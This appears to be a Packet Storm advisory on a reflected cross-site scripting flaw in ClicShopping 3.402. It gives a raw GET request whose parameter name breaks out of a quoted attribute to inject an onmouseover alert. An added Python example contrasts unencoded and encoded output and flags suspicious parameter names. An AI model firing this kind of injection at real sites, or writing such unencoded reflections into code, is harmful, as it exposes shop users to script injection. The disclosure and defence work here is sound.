Packet Storm | nu11secur1ty | PACKETSTORM:169946
Nov 21, 2022 - 12:00 a.m.

ClicShopping 3.402 Cross Site Scripting

packetstormsecurity.com
## Title: ClicShopping_V3-Version3.402 XSS-Reflected  
## Author: nu11secur1ty  
## Date: 11.20.2022  
## Vendor: https://www.clicshopping.org/forum/  
## Software: https://github.com/ClicShopping/ClicShopping_V3/releases/tag/version3_402  
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/clicshopping.org/2022/ClicShopping_V3  
  
## Description:  
The name of an arbitrarily supplied URL parameter is copied into the  
value of an HTML tag attribute that is enclosed in double quotation  
marks.  
An attacker can trick users into opening a very dangerous link, obtain  
sensitive information, or destroy some components of your system.  
  
## STATUS: HIGH Vulnerability  
  
[+] Payload:  
  
```js  
GET /ClicShopping_V3-version3_402/index.php?Search&AdvancedSearch&bel9c%22onmouseover%3d%22alert(`Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole`)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22zgm9j=1  
HTTP/1.1  
Host: pwnedhost.com  
Accept-Encoding: gzip, deflate  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Accept-Language: en-US;q=0.9,en;q=0.8  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
Connection: close  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"  
Sec-CH-UA-Platform: Windows  
Sec-CH-UA-Mobile: ?0  
  
```  
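
The reflection described above, as an added example that is not part of the original advisory or of ClicShopping's code: a hypothetical template (`render_form`) echoes the request's parameter names into a double-quoted `action` attribute, first unencoded and then with attribute-context encoding, and an HTML parser reports which attributes each version produces. The query string is a constructed, shortened sample shaped like the request above; `html.escape(quote=True)` plays the role that `htmlspecialchars` with `ENT_QUOTES` plays in PHP.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qsl

# Constructed sample: a shortened query string shaped like the advisory's request,
# with the markup carried in a parameter NAME rather than a value.
SAMPLE_QUERY = ("Search&AdvancedSearch&bel9c%22onmouseover%3d%22alert(1)"
                "%22style%3d%22top%3a0%22zgm9j=1")


def param_names(query):
    """URL-decoded parameter names, including names that carry no value."""
    return [name for name, _ in parse_qsl(query, keep_blank_values=True)]


def render_form(query, encode):
    """Hypothetical template: echo the request's parameter names into action="..."."""
    rebuilt = "&".join(param_names(query))
    if encode:
        # Attribute-context output encoding: " becomes &quot;, so the value cannot end early.
        rebuilt = escape(rebuilt, quote=True)
    return f'<form action="index.php?{rebuilt}">'


class AttrCollector(HTMLParser):
    """Records the attribute names an HTML parser sees on each start tag."""

    def __init__(self):
        super().__init__()
        self.names = []

    def handle_starttag(self, tag, attrs):
        self.names.extend(name for name, _ in attrs)


def attribute_names(markup):
    """Parse markup and return every attribute name found on its start tags."""
    collector = AttrCollector()
    collector.feed(markup)
    collector.close()
    return collector.names


def suspicious_names(query):
    """Parameter names containing characters that can break out of a quoted attribute."""
    return [n for n in param_names(query) if any(c in n for c in "\"'<>")]


if __name__ == "__main__":
    print(attribute_names(render_form(SAMPLE_QUERY, encode=False)))
    print(attribute_names(render_form(SAMPLE_QUERY, encode=True)))
    print(suspicious_names(SAMPLE_QUERY))
```

`suspicious_names` can also be run over logged query strings, because a check that inspects only parameter values never sees a payload carried in the name.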
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/clicshopping.org/2022/ClicShopping_V3)  
  
## Proof and Exploit:  
[href](https://streamable.com/mgbftx)  
  
## Time spent  
`1:00`  
  
  